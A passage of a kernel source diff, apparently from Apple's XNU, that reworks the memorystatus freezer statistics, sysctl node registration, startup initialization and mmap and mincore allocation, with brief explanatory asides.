         * This is just the default value if the underlying
         * storage device doesn't have any specific budget.
@@ -1208,7 +1146,7 @@ memorystatus_is_process_eligible_for_freeze(proc_t p)
         * Called with proc_list_lock held.
         */
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        boolean_t should_freeze = FALSE;
        uint32_t state = 0, pages = 0;
@@ -1332,9 +1270,15 @@ memorystatus_is_process_eligible_for_freeze(proc_t p)
 
        if (entry_count) {
                for (i = 0; i < entry_count; i++) {
+                       /*
+                        * NB: memorystatus_internal_probabilities.proc_name is MAXCOMLEN + 1 bytes
+                        * proc_t.p_name is 2*MAXCOMLEN + 1 bytes. So we only compare the first
+                        * MAXCOMLEN bytes here since the name in the probabilities table could
+                        * be truncated from the proc_t's p_name.
+                        */
                        if (strncmp(memorystatus_global_probabilities_table[i].proc_name,
                            p->p_name,
-                           MAXCOMLEN + 1) == 0) {
+                           MAXCOMLEN) == 0) {
                                probability_of_use = memorystatus_global_probabilities_table[i].use_probability;
                                break;
                        }
@@ -1475,6 +1419,7 @@ memorystatus_freeze_process_sync(proc_t p)
                                p->p_memstat_state |= P_MEMSTAT_FROZEN;
                                p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone;
                                memorystatus_frozen_count++;
+                               os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed);
                                if (memorystatus_frozen_count == memorystatus_frozen_processes_max) {
                                        memorystatus_freeze_out_of_slots();
                                }
@@ -1719,6 +1664,7 @@ freeze_process:
                                p->p_memstat_state |= P_MEMSTAT_FROZEN;
                                p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone;
                                memorystatus_frozen_count++;
+                               os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed);
                                if (memorystatus_frozen_count == memorystatus_frozen_processes_max) {
                                        memorystatus_freeze_out_of_slots();
                                }
@@ -1863,7 +1809,7 @@ freeze_process:
                        } else {
                                p->p_memstat_state |= P_MEMSTAT_FREEZE_IGNORE;
                        }
-                       memorystatus_freeze_handle_error(p, p->p_memstat_state & P_MEMSTAT_FROZEN, freezer_error_code, aPid, coal, "memorystatus_freeze_top_process");
+                       memorystatus_freeze_handle_error(p, freezer_error_code, p->p_memstat_state & P_MEMSTAT_FROZEN, aPid, coal, "memorystatus_freeze_top_process");
 
                        proc_rele_locked(p);
 
@@ -1899,6 +1845,33 @@ freeze_process:
        return ret;
 }
 
+#if DEVELOPMENT || DEBUG
+/* For testing memorystatus_freeze_top_process */
+static int
+sysctl_memorystatus_freeze_top_process SYSCTL_HANDLER_ARGS
+{
+#pragma unused(arg1, arg2)
+       int error, val;
+       /*
+        * Only freeze on write to prevent freezing during `sysctl -a`.
+        * The actual value written doesn't matter.
+        */
+       error = sysctl_handle_int(oidp, &val, 0, req);
+       if (error || !req->newptr) {
+               return error;
+       }
+       lck_mtx_lock(&freezer_mutex);
+       int ret = memorystatus_freeze_top_process();
+       lck_mtx_unlock(&freezer_mutex);
+       if (ret == -1) {
+               ret = ESRCH;
+       }
+       return ret;
+}
+SYSCTL_PROC(_vm, OID_AUTO, memorystatus_freeze_top_process, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED,
+    0, 0, &sysctl_memorystatus_freeze_top_process, "I", "");
+#endif /* DEVELOPMENT || DEBUG */
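
A user-space sketch of poking the new test-only trigger; the sysctl name follows from the SYSCTL_PROC(_vm, ...) declaration above, and sysctlbyname() is the standard interface (DEVELOPMENT/DEBUG kernels only):

#include <errno.h>
#include <sys/sysctl.h>

static int
trigger_freeze_top_process(void)
{
        int one = 1;

        /* the written value is ignored; the write itself runs the freezer once */
        if (sysctlbyname("vm.memorystatus_freeze_top_process",
            NULL, NULL, &one, sizeof(one)) != 0) {
                return errno;   /* e.g. ESRCH when nothing could be frozen */
        }
        return 0;
}
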
+
 static inline boolean_t
 memorystatus_can_freeze_processes(void)
 {
@@ -2146,7 +2119,7 @@ static void
 memorystatus_freeze_mark_eligible_processes_with_skip_reason(memorystatus_freeze_skip_reason_t reason, bool locked)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED);
        unsigned int band = JETSAM_PRIORITY_IDLE;
        proc_t p;
 
@@ -2225,7 +2198,7 @@ static void
 memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_timespec_t start_ts)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        normal_throttle_window->max_pageouts = new_budget;
        normal_throttle_window->ts.tv_sec = normal_throttle_window->mins * 60;
@@ -2239,6 +2212,13 @@ memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_tim
        }
        /* Ensure the normal window is now active. */
        memorystatus_freeze_degradation = FALSE;
+       memorystatus_freezer_stats.mfs_shared_pages_skipped = 0;
+       /*
+        * Reset the thawed percentage to 0 so we re-evaluate in the new interval.
+        */
+       os_atomic_store(&memorystatus_freezer_stats.mfs_processes_thawed, 0, release);
+       os_atomic_store(&memorystatus_freezer_stats.mfs_processes_frozen, memorystatus_frozen_count, release);
+       os_atomic_inc(&memorystatus_freeze_current_interval, release);
 }
 
 #if DEVELOPMENT || DEBUG
@@ -2273,7 +2253,7 @@ static void
 memorystatus_freeze_out_of_budget(const struct throttle_interval_t *interval)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        mach_timespec_t time_left = {0, 0};
        mach_timespec_t now_ts;
@@ -2302,7 +2282,7 @@ static void
 memorystatus_freeze_out_of_slots(void)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        assert(memorystatus_frozen_count == memorystatus_frozen_processes_max);
 
        os_log(OS_LOG_DEFAULT,
@@ -2338,7 +2318,7 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed)
        clock_nsec_t nsec;
        mach_timespec_t now_ts;
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        unsigned int freeze_daily_pageouts_max = 0;
        uint32_t budget_rollover = 0;
@@ -2386,7 +2366,6 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed)
                            interval->mins, budget_rollover),
                    now_ts);
                *budget_pages_allowed = interval->max_pageouts;
-               memorystatus_freezer_stats.mfs_shared_pages_skipped = 0;
 
                memorystatus_demote_frozen_processes(FALSE); /* normal mode...don't force a demotion */
        } else {
index 85ffba28d6ec0b39815b097a18db722418162c7e..691e117328592982693bcc0ccb595caecfd56be8 100644 (file)
@@ -140,7 +140,7 @@ static int      cputhreadtype, cpu64bit;
 static uint64_t cacheconfig[10], cachesize[10];
 static int      packages;
 
-static char *   osenvironment;
+static char *   osenvironment = NULL;
 static uint32_t osenvironment_size = 0;
 static int      osenvironment_initialized = 0;
 
@@ -152,21 +152,21 @@ static struct {
        uint32_t use_recovery_securityd:1;
 } property_existence = {0, 0};
 
-SYSCTL_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Sysctl internal magic");
-SYSCTL_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "High kernel, proc, limits &c");
-SYSCTL_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Virtual memory");
-SYSCTL_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "File system");
-SYSCTL_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Network, (see socket.h)");
-SYSCTL_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Debugging");
 SYSCTL_NODE(, CTL_HW, hw, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "hardware");
-SYSCTL_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "machine dependent");
 SYSCTL_NODE(, CTL_USER, user, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "user-level");
@@ -475,11 +475,14 @@ sysctl_tbfrequency
        return sysctl_io_number(req, l, sizeof(l), NULL, NULL);
 }
 
+/*
+ * Called by IOKit on Intel, or by sysctl_load_devicetree_entries()
+ */
 void
 sysctl_set_osenvironment(unsigned int size, const void* value)
 {
        if (osenvironment_size == 0 && size > 0) {
-               MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK);
+               osenvironment = zalloc_permanent(size, ZALIGN_NONE);
                if (osenvironment) {
                        memcpy(osenvironment, value, size);
                        osenvironment_size = size;
@@ -501,7 +504,8 @@ sysctl_unblock_osenvironment(void)
  * PE_init_iokit(). Doing this also avoids the extern-C hackery to access these entries
  * from IORegistry (which requires C++).
  */
-void
+__startup_func
+static void
 sysctl_load_devicetree_entries(void)
 {
        DTEntry chosen;
@@ -514,11 +518,7 @@ sysctl_load_devicetree_entries(void)
 
        /* load osenvironment */
        if (kSuccess == SecureDTGetProperty(chosen, "osenvironment", (void const **) &value, &size)) {
-               MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK);
-               if (osenvironment) {
-                       memcpy(osenvironment, value, size);
-                       osenvironment_size = size;
-               }
+               sysctl_set_osenvironment(size, value);
        }
 
        /* load ephemeral_storage */
@@ -537,6 +537,7 @@ sysctl_load_devicetree_entries(void)
                }
        }
 }
+STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_load_devicetree_entries);
 
 static int
 sysctl_osenvironment
@@ -745,7 +746,7 @@ SYSCTL_INT(_hw_optional, OID_AUTO, floatingpoint, CTLFLAG_RD | CTLFLAG_KERN | CT
 /*
  * Optional device hardware features can be registered by drivers below hw.features
  */
-SYSCTL_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features");
+SYSCTL_EXTENSIBLE_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features");
 
 /*
  * Deprecated variables.  These are supported for backwards compatibility
@@ -912,7 +913,6 @@ SYSCTL_INT(_hw_optional, OID_AUTO, arm64, CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LO
 void
 sysctl_mib_init(void)
 {
-       cputhreadtype = cpu_threadtype();
 #if defined(__i386__) || defined (__x86_64__)
        cpu64bit = (_get_cpu_capabilities() & k64Bit) == k64Bit;
 #elif defined(__arm__) || defined (__arm64__)
@@ -921,18 +921,6 @@ sysctl_mib_init(void)
 #error Unsupported arch
 #endif
 
-       /*
-        * Populate the optional portion of the hw.* MIB.
-        *
-        * XXX This could be broken out into parts of the code
-        *     that actually directly relate to the functions in
-        *     question.
-        */
-
-       if (cputhreadtype != CPU_THREADTYPE_NONE) {
-               sysctl_register_oid(&sysctl__hw_cputhreadtype);
-       }
-
 #if defined (__i386__) || defined (__x86_64__)
        /* hw.cacheconfig */
        cacheconfig[0] = ml_cpu_cache_sharing(0);
@@ -976,8 +964,28 @@ sysctl_mib_init(void)
        cachesize[4] = 0;
 
        packages = 1;
-
 #else
 #error unknown architecture
 #endif /* !__i386__ && !__x86_64 && !__arm__ && !__arm64__ */
 }
+
+__startup_func
+static void
+sysctl_mib_startup(void)
+{
+       cputhreadtype = cpu_threadtype();
+
+       /*
+        * Populate the optional portion of the hw.* MIB.
+        *
+        * XXX This could be broken out into parts of the code
+        *     that actually directly relate to the functions in
+        *     question.
+        */
+
+       if (cputhreadtype != CPU_THREADTYPE_NONE) {
+               sysctl_register_oid_early(&sysctl__hw_cputhreadtype);
+       }
+
+}
+STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_mib_startup);
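
Both registration paths now run as boot-time callbacks: STARTUP() schedules a __startup_func at the given subsystem and rank instead of an explicit call from an *_init() routine. A minimal sketch of the pattern with a hypothetical callback:

__startup_func
static void
example_startup(void)
{
        /* one-time boot initialization, run at the SYSCTL / STARTUP_RANK_MIDDLE point */
}
STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, example_startup);
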
index 9e9e8f8f26fe46b18d27079232e314373383cfbb..0cc17e529abaec1db52d89ed72ae1ba9aa049f6d 100644 (file)
@@ -273,7 +273,7 @@ mmap(proc_t p, struct mmap_args *uap, user_addr_t *retval)
 
 
        /* make sure mapping fits into numeric range etc */
-       if (os_add3_overflow(file_pos, user_size, PAGE_SIZE_64 - 1, &sum)) {
+       if (os_add3_overflow(file_pos, user_size, vm_map_page_size(user_map) - 1, &sum)) {
                return EINVAL;
        }
 
@@ -850,10 +850,10 @@ bad:
        }
 
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_mmap) | DBG_FUNC_NONE), fd, (uint32_t)(*retval), (uint32_t)user_size, error, 0);
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO2, SYS_mmap) | DBG_FUNC_NONE), (uint32_t)(*retval >> 32), (uint32_t)(user_size >> 32),
            (uint32_t)(file_pos >> 32), (uint32_t)file_pos, 0);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
        return error;
 }
 
@@ -877,9 +877,9 @@ msync_nocancel(__unused proc_t p, struct msync_nocancel_args *uap, __unused int3
        user_map = current_map();
        addr = (mach_vm_offset_t) uap->addr;
        size = (mach_vm_size_t) uap->len;
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_msync) | DBG_FUNC_NONE), (uint32_t)(addr >> 32), (uint32_t)(size >> 32), 0, 0, 0);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
        if (mach_vm_range_overflows(addr, size)) {
                return EINVAL;
        }
@@ -1272,8 +1272,9 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval)
 
        req_vec_size_pages = (end - addr) >> effective_page_shift;
        cur_vec_size_pages = MIN(req_vec_size_pages, (MAX_PAGE_RANGE_QUERY >> effective_page_shift));
+       size_t kernel_vec_size = cur_vec_size_pages;
 
-       kernel_vec = (void*) _MALLOC(cur_vec_size_pages * sizeof(char), M_TEMP, M_WAITOK | M_ZERO);
+       kernel_vec = kheap_alloc(KHEAP_TEMP, kernel_vec_size, Z_WAITOK | Z_ZERO);
 
        if (kernel_vec == NULL) {
                return ENOMEM;
@@ -1285,10 +1286,11 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval)
        vec = uap->vec;
 
        pqueryinfo_vec_size = cur_vec_size_pages * sizeof(struct vm_page_info_basic);
-       info = (void*) _MALLOC(pqueryinfo_vec_size, M_TEMP, M_WAITOK);
+
+       info = kheap_alloc(KHEAP_TEMP, pqueryinfo_vec_size, Z_WAITOK);
 
        if (info == NULL) {
-               FREE(kernel_vec, M_TEMP);
+               kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size);
                return ENOMEM;
        }
 
@@ -1366,8 +1368,8 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval)
                first_addr = addr;
        }
 
-       FREE(kernel_vec, M_TEMP);
-       FREE(info, M_TEMP);
+       kheap_free(KHEAP_TEMP, info, pqueryinfo_vec_size);
+       kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size);
 
        if (error) {
                return EFAULT;
index b6765a202db9313f25400dbcf343d5d595055c66..481e11cbd35efb742e8f2e8df873e5177fb3acdd 100644 (file)
@@ -67,6 +67,7 @@
  */
 
 
+#include <kern/counter.h>
 #include <sys/param.h>
 #include <sys/buf.h>
 #include <sys/kernel.h>
 #include <sys/systm.h>
 #include <sys/sysproto.h>
 
+#include <os/atomic_private.h>
+
 #include <security/audit/audit.h>
 #include <pexpert/pexpert.h>
 
+#include <IOKit/IOBSD.h>
+
 #if CONFIG_MACF
 #include <security/mac_framework.h>
 #endif
@@ -89,9 +94,9 @@
 #include <ptrauth.h>
 #endif /* defined(HAS_APPLE_PAC) */
 
-lck_grp_t * sysctl_lock_group = NULL;
-lck_rw_t * sysctl_geometry_lock = NULL;
-lck_mtx_t * sysctl_unlocked_node_lock = NULL;
+static LCK_GRP_DECLARE(sysctl_lock_group, "sysctl");
+static LCK_RW_DECLARE(sysctl_geometry_lock, &sysctl_lock_group);
+static LCK_MTX_DECLARE(sysctl_unlocked_node_lock, &sysctl_lock_group);
 
 /*
  * Conditionally allow dtrace to see these functions for debugging purposes.
@@ -135,7 +140,8 @@ int     userland_sysctl(boolean_t string_is_canonical,
     int *name, u_int namelen, struct sysctl_req *req,
     size_t *retval);
 
-struct sysctl_oid_list sysctl__children; /* root list */
+SECURITY_READ_ONLY_LATE(struct sysctl_oid_list) sysctl__children; /* root list */
+__SYSCTL_EXTENSION_NODE();
 
 /*
  * Initialization of the MIB tree.
@@ -143,14 +149,104 @@ struct sysctl_oid_list sysctl__children; /* root list */
  * Order by number in each list.
  */
 
+static void
+sysctl_register_oid_locked(struct sysctl_oid *new_oidp,
+    struct sysctl_oid *oidp)
+{
+       struct sysctl_oid_list *parent = new_oidp->oid_parent;
+       struct sysctl_oid_list *parent_rw = NULL;
+       struct sysctl_oid *p, **prevp;
+
+       p = SLIST_FIRST(parent);
+       if (p && p->oid_number == OID_MUTABLE_ANCHOR) {
+               parent_rw = p->oid_arg1;
+       }
+
+       if (oidp->oid_number == OID_AUTO) {
+               int n = OID_AUTO_START;
+
+               /*
+                * If this oid has a number OID_AUTO, give it a number which
+                * is greater than any current oid.  Make sure it is at least
+                * OID_AUTO_START to leave space for pre-assigned oid numbers.
+                */
+
+               SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) {
+                       if (p->oid_number >= n) {
+                               n = p->oid_number + 1;
+                       }
+               }
+
+               if (parent_rw) {
+                       SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) {
+                               if (p->oid_number >= n) {
+                                       n = p->oid_number + 1;
+                               }
+                       }
+               }
+
+               /*
+                * Reflect the number in an allocated OID into the template
+                * of the caller for sysctl_unregister_oid() compares.
+                */
+               oidp->oid_number = new_oidp->oid_number = n;
+       } else {
+               /*
+                * Insert the oid into the parent's list in order.
+                */
+               SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) {
+                       if (oidp->oid_number == p->oid_number) {
+                               panic("attempting to register a sysctl at previously registered slot : %d",
+                                   oidp->oid_number);
+                       } else if (oidp->oid_number < p->oid_number) {
+                               break;
+                       }
+               }
+
+               if (parent_rw) {
+                       SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) {
+                               if (oidp->oid_number == p->oid_number) {
+                                       panic("attempting to register a sysctl at previously registered slot : %d",
+                                           oidp->oid_number);
+                               } else if (oidp->oid_number < p->oid_number) {
+                                       break;
+                               }
+                       }
+               }
+       }
+
+#if defined(HAS_APPLE_PAC)
+       if (oidp->oid_handler) {
+               /*
+                * Sign oid_handler address-discriminated upon installation to make it
+                * harder to replace with an arbitrary function pointer.  Blend with
+                * a hash of oid_arg1 for robustness against memory corruption.
+                */
+               oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler,
+                   ptrauth_key_function_pointer,
+                   ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)),
+                   ptrauth_key_function_pointer,
+                   ptrauth_blend_discriminator(&oidp->oid_handler,
+                   os_hash_kernel_pointer(oidp->oid_arg1)));
+       }
+#endif /* defined(HAS_APPLE_PAC) */
+
+       SLIST_NEXT(oidp, oid_link) = *prevp;
+       *prevp = oidp;
+}
+
 void
 sysctl_register_oid(struct sysctl_oid *new_oidp)
 {
-       struct sysctl_oid *oidp = NULL;
-       struct sysctl_oid_list *parent = new_oidp->oid_parent;
-       struct sysctl_oid *p;
-       struct sysctl_oid *q;
-       int n;
+       struct sysctl_oid *oidp;
+
+       if (new_oidp->oid_number < OID_AUTO) {
+               panic("trying to register a node %p with an invalid oid_number: %d",
+                   new_oidp, new_oidp->oid_number);
+       }
+       if (new_oidp->oid_kind & CTLFLAG_PERMANENT) {
+               panic("Use sysctl_register_oid_early to register permanent nodes");
+       }
 
        /*
         * The OID can be old-style (needs copy), new style without an earlier
@@ -161,10 +257,11 @@ sysctl_register_oid(struct sysctl_oid *new_oidp)
        if (!(new_oidp->oid_kind & CTLFLAG_OID2)) {
 #if __x86_64__
                /*
-                * XXX: M_TEMP is perhaps not the most apropriate zone, as it
+                * XXX: KHEAP_DEFAULT is perhaps not the most appropriate zone, as it
                 * XXX: will subject us to use-after-free by other consumers.
                 */
-               MALLOC(oidp, struct sysctl_oid *, sizeof(*oidp), M_TEMP, M_WAITOK | M_ZERO);
+               oidp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct sysctl_oid),
+                   Z_WAITOK | Z_ZERO);
                if (oidp == NULL) {
                        return;         /* reject: no memory */
                }
@@ -175,7 +272,7 @@ sysctl_register_oid(struct sysctl_oid *new_oidp)
                 * Note:        We may want to set the oid_descr to the
                 *              oid_name (or "") at some future date.
                 */
-               *oidp = *new_oidp;
+               memcpy(oidp, new_oidp, offsetof(struct sysctl_oid, oid_descr));
 #else
                panic("Old style sysctl without a version number isn't supported");
 #endif
@@ -191,68 +288,30 @@ sysctl_register_oid(struct sysctl_oid *new_oidp)
                }
        }
 
-       /* Get the write lock to modify the geometry */
-       lck_rw_lock_exclusive(sysctl_geometry_lock);
-
-       /*
-        * If this oid has a number OID_AUTO, give it a number which
-        * is greater than any current oid.  Make sure it is at least
-        * OID_AUTO_START to leave space for pre-assigned oid numbers.
-        */
-       if (oidp->oid_number == OID_AUTO) {
-               /* First, find the highest oid in the parent list >OID_AUTO_START-1 */
-               n = OID_AUTO_START;
-               SLIST_FOREACH(p, parent, oid_link) {
-                       if (p->oid_number > n) {
-                               n = p->oid_number;
-                       }
-               }
-               oidp->oid_number = n + 1;
-               /*
-                * Reflect the number in an llocated OID into the template
-                * of the caller for sysctl_unregister_oid() compares.
-                */
-               if (oidp != new_oidp) {
-                       new_oidp->oid_number = oidp->oid_number;
-               }
-       }
+       lck_rw_lock_exclusive(&sysctl_geometry_lock);
+       sysctl_register_oid_locked(new_oidp, oidp);
+       lck_rw_unlock_exclusive(&sysctl_geometry_lock);
+}
 
-#if defined(HAS_APPLE_PAC)
-       if (oidp->oid_handler) {
-               /*
-                * Sign oid_handler address-discriminated upon installation to make it
-                * harder to replace with an arbitrary function pointer.  Blend with
-                * a hash of oid_arg1 for robustness against memory corruption.
-                */
-               oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler,
-                   ptrauth_key_function_pointer,
-                   ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)),
-                   ptrauth_key_function_pointer,
-                   ptrauth_blend_discriminator(&oidp->oid_handler,
-                   os_hash_kernel_pointer(oidp->oid_arg1)));
-       }
-#endif /* defined(HAS_APPLE_PAC) */
+__startup_func
+void
+sysctl_register_oid_early(struct sysctl_oid *oidp)
+{
+       assert((oidp->oid_kind & CTLFLAG_OID2) &&
+           (oidp->oid_kind & CTLFLAG_PERMANENT) &&
+           oidp->oid_version == SYSCTL_OID_VERSION);
+       assert(startup_phase < STARTUP_SUB_SYSCTL);
 
        /*
-        * Insert the oid into the parent's list in order.
+        * Clear the flag so that callers can use sysctl_register_oid_early
+        * again if they wish to register their node.
         */
-       q = NULL;
-       SLIST_FOREACH(p, parent, oid_link) {
-               if (oidp->oid_number == p->oid_number) {
-                       panic("attempting to register a sysctl at previously registered slot : %d", oidp->oid_number);
-               } else if (oidp->oid_number < p->oid_number) {
-                       break;
-               }
-               q = p;
-       }
-       if (q) {
-               SLIST_INSERT_AFTER(q, oidp, oid_link);
-       } else {
-               SLIST_INSERT_HEAD(parent, oidp, oid_link);
+       if (oidp->oid_kind & CTLFLAG_NOAUTO) {
+               oidp->oid_kind &= ~CTLFLAG_NOAUTO;
+               return;
        }
 
-       /* Release the write lock */
-       lck_rw_unlock_exclusive(sysctl_geometry_lock);
+       sysctl_register_oid_locked(oidp, oidp);
 }
 
 void
@@ -261,12 +320,20 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
        struct sysctl_oid *removed_oidp = NULL; /* OID removed from tree */
 #if __x86_64__
        struct sysctl_oid *old_oidp = NULL;     /* OID compatibility copy */
-#else
-       struct sysctl_oid *const old_oidp = NULL;
 #endif
+       struct sysctl_oid_list *lsp;
 
        /* Get the write lock to modify the geometry */
-       lck_rw_lock_exclusive(sysctl_geometry_lock);
+       lck_rw_lock_exclusive(&sysctl_geometry_lock);
+
+       lsp = oidp->oid_parent;
+       if (SLIST_FIRST(lsp) && SLIST_FIRST(lsp)->oid_number == OID_MUTABLE_ANCHOR) {
+               lsp = SLIST_FIRST(lsp)->oid_arg1;
+       }
+
+       if (oidp->oid_kind & CTLFLAG_PERMANENT) {
+               panic("Trying to unregister permanent sysctl %p", oidp);
+       }
 
        if (!(oidp->oid_kind & CTLFLAG_OID2)) {
 #if __x86_64__
@@ -276,13 +343,13 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
                 * partial structure; when we find a match, we remove it
                 * normally and free the memory.
                 */
-               SLIST_FOREACH(old_oidp, oidp->oid_parent, oid_link) {
+               SLIST_FOREACH(old_oidp, lsp, oid_link) {
                        if (!memcmp(&oidp->oid_number, &old_oidp->oid_number, (offsetof(struct sysctl_oid, oid_descr) - offsetof(struct sysctl_oid, oid_number)))) {
                                break;
                        }
                }
                if (old_oidp != NULL) {
-                       SLIST_REMOVE(old_oidp->oid_parent, old_oidp, sysctl_oid, oid_link);
+                       SLIST_REMOVE(lsp, old_oidp, sysctl_oid, oid_link);
                        removed_oidp = old_oidp;
                }
 #else
@@ -293,7 +360,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
                switch (oidp->oid_version) {
                case SYSCTL_OID_VERSION:
                        /* We can just remove the OID directly... */
-                       SLIST_REMOVE(oidp->oid_parent, oidp, sysctl_oid, oid_link);
+                       SLIST_REMOVE(lsp, oidp, sysctl_oid, oid_link);
                        removed_oidp = oidp;
                        break;
                default:
@@ -303,7 +370,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
        }
 
 #if defined(HAS_APPLE_PAC)
-       if (removed_oidp && removed_oidp->oid_handler && old_oidp == NULL) {
+       if (removed_oidp && removed_oidp->oid_handler) {
                /*
                 * Revert address-discriminated signing performed by
                 * sysctl_register_oid() (in case this oid is registered again).
@@ -326,47 +393,17 @@ sysctl_unregister_oid(struct sysctl_oid *oidp)
         * Note:        oidp could be NULL if it wasn't found.
         */
        while (removed_oidp && removed_oidp->oid_refcnt) {
-               lck_rw_sleep(sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE, &removed_oidp->oid_refcnt, THREAD_UNINT);
+               lck_rw_sleep(&sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE,
+                   &removed_oidp->oid_refcnt, THREAD_UNINT);
        }
 
        /* Release the write lock */
-       lck_rw_unlock_exclusive(sysctl_geometry_lock);
+       lck_rw_unlock_exclusive(&sysctl_geometry_lock);
 
-       if (old_oidp != NULL) {
 #if __x86_64__
-               /* If it was allocated, free it after dropping the lock */
-               FREE(old_oidp, M_TEMP);
+       /* If it was allocated, free it after dropping the lock */
+       kheap_free(KHEAP_DEFAULT, old_oidp, sizeof(struct sysctl_oid));
 #endif
-       }
-}
-
-/*
- * Bulk-register all the oids in a linker_set.
- */
-void
-sysctl_register_set(const char *set)
-{
-       struct sysctl_oid **oidpp, *oidp;
-
-       LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) {
-               oidp = *oidpp;
-               if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) {
-                       sysctl_register_oid(oidp);
-               }
-       }
-}
-
-void
